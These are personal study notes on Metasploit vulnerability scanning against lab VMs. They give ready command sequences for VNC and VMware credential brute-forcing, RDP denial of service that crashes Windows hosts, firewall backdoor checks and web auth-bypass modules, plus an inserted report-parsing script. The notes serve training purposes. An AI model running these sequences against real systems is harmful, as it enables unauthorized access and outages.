Kali Linux Study Notes (95): Metasploit Framework: Vulnerability Scanning 2020.4.27

Preface

This part covers vulnerability scanning with msf:

  • search for exploit modules based on the results of information gathering
  • combine with an external vulnerability scanner to batch-scan large IP address ranges
  • false positives and false negatives are certain, so results should be verified

1. Preparation

Target: metasploitable

IP: 192.168.1.120

netstat -pantu | grep 5900 # confirm VNC is listening

Target: winxp

Remote Desktop enabled
Firewall disabled
IP: 192.168.1.122

Target: win7

Remote Desktop enabled
Firewall disabled
IP: 192.168.1.123

Attacker: kali

IP: 192.168.1.121

service postgresql start
netstat -pantu | grep 5432 # confirm the port is open
msfconsole

2. VNC password cracking

msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary(scanner/vnc/vnc_login) > show options
msf auxiliary(scanner/vnc/vnc_login) > set BLANK_PASSWORDS true
msf auxiliary(scanner/vnc/vnc_login) > set THREADS 20 # number of threads
msf auxiliary(scanner/vnc/vnc_login) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/vnc/vnc_login) > run
# Pick a suitable password dictionary; a default one is included

3. VNC access without a password (no password set)

This is a server misconfiguration; worth trying.

msf > use auxiliary/scanner/vnc/vnc_none_auth
msf auxiliary(scanner/vnc/vnc_none_auth) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/vnc/vnc_none_auth) > run
# The port can be changed to match the target; one thread is enough

4. RDP Remote Desktop vulnerability

The well-known ms12_020 vulnerability.

msf > use auxiliary/scanner/rdp/ms12_020_check # the check itself does not cause a DoS
msf auxiliary(scanner/rdp/ms12_020_check) > set RHOSTS 192.168.1.122 192.168.1.123
msf auxiliary(scanner/rdp/ms12_020_check) > run
# Both hosts are reported vulnerable; try the attack
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids # this one does cause a DoS
msf auxiliary(ms12_020_maxchannelids) > set RHOSTS 192.168.1.122
msf auxiliary(ms12_020_maxchannelids) > run
# XP blue-screens and reboots
msf auxiliary(ms12_020_maxchannelids) > set RHOSTS 192.168.1.123
msf auxiliary(ms12_020_maxchannelids) > run
# Win7 blue-screens and reboots

5. Device backdoors

msf > use auxiliary/scanner/ssh/juniper_backdoor # Juniper firewalls; only RHOSTS needs to be set
msf > use auxiliary/scanner/ssh/fortinet_backdoor # Fortinet firewalls; only RHOSTS needs to be set

6. VMware

# Brute-force usernames and passwords
msf > use auxiliary/scanner/vmware/vmauthd_login
msf auxiliary(vmauthd_login) > set BLANK_PASSWORDS true
msf auxiliary(vmauthd_login) > set RHOSTS 192.168.1.0/24
msf auxiliary(vmauthd_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/vmworks_common_20.txt
msf auxiliary(vmauthd_login) > set USERNAME root
msf auxiliary(vmauthd_login) > run
# After gaining access, enumerate all virtual machines
msf > use auxiliary/scanner/vmware/vmware_enum_vms
# Various other information-gathering modules are available
# Power on a virtual machine remotely via the web API
msf > use auxiliary/admin/vmware/poweron_vm

7. HTTP vulnerability scanning

# Expired certificates
msf > use auxiliary/scanner/http/cert
msf auxiliary(scanner/http/cert) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/http/cert) > set THREADS 20
msf auxiliary(scanner/http/cert) > run
# List directories and files
msf > use auxiliary/scanner/http/dir_listing
msf auxiliary(scanner/http/dir_listing) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/http/dir_listing) > set PATH dav
msf auxiliary(scanner/http/dir_listing) > run
msf auxiliary(scanner/http/dir_listing) > use auxiliary/scanner/http/files_dir
msf auxiliary(scanner/http/files_dir) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/http/files_dir) > run
# WebDAV Unicode-encoding authentication bypass
msf > use auxiliary/scanner/http/dir_webdav_unicode_bypass
msf auxiliary(scanner/http/dir_webdav_unicode_bypass) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/http/dir_webdav_unicode_bypass) > set THREADS 20
msf auxiliary(scanner/http/dir_webdav_unicode_bypass) > run
# Tomcat manager login page
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/http/tomcat_mgr_login) > run
# Authentication bypass based on HTTP verbs
msf > use auxiliary/scanner/http/verb_auth_bypass
msf auxiliary(scanner/http/verb_auth_bypass) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/http/verb_auth_bypass) > run
# WordPress password brute-force
msf > use auxiliary/scanner/http/wordpress_login_enum
msf auxiliary(scanner/http/wordpress_login_enum) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/http/wordpress_login_enum) > run

8. WMAP web application scanner

Developed following the way sqlmap works.
wmap is a plugin.

msf > load wmap
msf > wmap_sites -h
msf > wmap_sites -a http://192.168.1.120
msf > wmap_targets -t http://192.168.1.120/mutillidae/index.php
msf > wmap_run -h
msf > wmap_run -t # list all modules
msf > wmap_run -e # start the scan
msf > wmap_vulns -l # view the discovered vulnerabilities
msf > vulns

9. OpenVAS

The command-line mode needs configuration and is cumbersome to use,
so use the web interface at 127.0.0.1:9392 instead.
After the scan, generate a report in nbe format, 1.nbe.
Import the nbe scan log 1.nbe into msf:

msf > load openvas
msf > openvas_help
msf > db_import 1.nbe
msf > vulns
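As an added example (not part of the original notes), a small Python parser for the kind of .nbe report that `db_import` consumes above: it skips the timestamp records, parses the pipe-delimited `results` records and groups the findings per host by severity, roughly the triage view `vulns` gives inside msf. The field layout (results|subnet|host|service|plugin_id|severity|description) is an assumption about the format, and the sample report is constructed, not output from a real scan.

```python
import re
from collections import defaultdict

# Constructed sample of an OpenVAS/Nessus-style .nbe report, the format the
# notes import with `db_import 1.nbe`. The pipe-delimited field layout
# (results|subnet|host|service|plugin_id|severity|description) is assumed.
SAMPLE_NBE = """\
timestamps|||scan_start|Mon Apr 27 10:00:00 2020|
timestamps||192.168.1.120|host_start|Mon Apr 27 10:00:05 2020|
results|192.168.1|192.168.1.120|vnc (5900/tcp)|10342|Security Hole|VNC server accepts a blank password.\\nAnyone reaching the port can log in.
results|192.168.1|192.168.1.120|http (80/tcp)|10386|Security Warning|Directory listing is enabled under /dav/.
results|192.168.1|192.168.1.120|ssh (22/tcp)|10267|Security Note|SSH server banner: OpenSSH 4.7p1
timestamps||192.168.1.120|host_end|Mon Apr 27 10:02:00 2020|
timestamps|||scan_end|Mon Apr 27 10:02:01 2020|
"""

SERVICE_RE = re.compile(r"^(?P<name>\S+)\s*\((?P<port>\d+)/(?P<proto>\w+)\)$")

def parse_nbe(text):
    """Return one dict per `results` record; timestamp records are skipped."""
    findings = []
    for line in text.splitlines():
        fields = line.split("|", 6)  # description may itself contain '|'
        if fields[0] != "results" or len(fields) < 7:
            continue
        _, _subnet, host, service, plugin_id, severity, desc = fields
        m = SERVICE_RE.match(service)  # e.g. "vnc (5900/tcp)"
        findings.append({
            "host": host,
            "port": int(m.group("port")) if m else None,
            "proto": m.group("proto") if m else None,
            "plugin_id": plugin_id,
            "severity": severity,
            "description": desc.replace("\\n", " ").strip(),  # literal \n in NBE
        })
    return findings

def summarize(findings, min_severity="Security Warning"):
    """Group findings by host, keeping only those at or above min_severity."""
    rank = {"Security Note": 0, "Security Warning": 1, "Security Hole": 2}
    by_host = defaultdict(list)
    for f in findings:
        if rank.get(f["severity"], 0) >= rank[min_severity]:
            by_host[f["host"]].append(f)
    return dict(by_host)

if __name__ == "__main__":
    for host, items in summarize(parse_nbe(SAMPLE_NBE)).items():
        for f in sorted(items, key=lambda f: f["port"] or 0):
            print(f"{host}:{f['port']}/{f['proto']} [{f['severity']}] {f['description']}")
```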

10. Calling Nessus directly from MSF

Connect directly to Nessus:

msf > load nessus
msf > nessus_help
msf > nessus_connect admin:[email protected]
msf > nessus_policy_list
msf > nessus_scan_new
msf > nessus_report_list

Closing

msf offers a rich set of vulnerability scanning techniques,
and many third-party plugins are available.
